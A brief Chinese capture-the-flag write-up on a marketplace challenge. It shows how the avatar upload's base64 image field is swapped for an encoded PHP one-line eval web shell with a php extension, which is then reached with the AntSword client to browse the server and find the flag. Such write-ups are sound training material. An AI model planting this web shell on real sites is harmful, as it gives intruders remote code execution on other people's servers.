0x001 wp
打开题目,点击进入链接,是一个二手交易市场平台
开始想的可不可能是修改购买价格,然后发现根本没有购买功能,只能先登录看看
根据我学过的一丢丢漏洞知识,感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;
前两个观摩尝试了半天,没找到头绪。
看看头像上传,上传文件,抓包
看到后面好长一串,image
参数后面是文件后缀JPEG
,然后有base 64
,再后面应该是图片的base64
编码,看看传个一句马试试
先把<?php @eval($_POST['huacheng']);?>base64
加密一下,提换掉后面的一长串,然后改一下后缀为php
响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag
0x002 结束语
我不后悔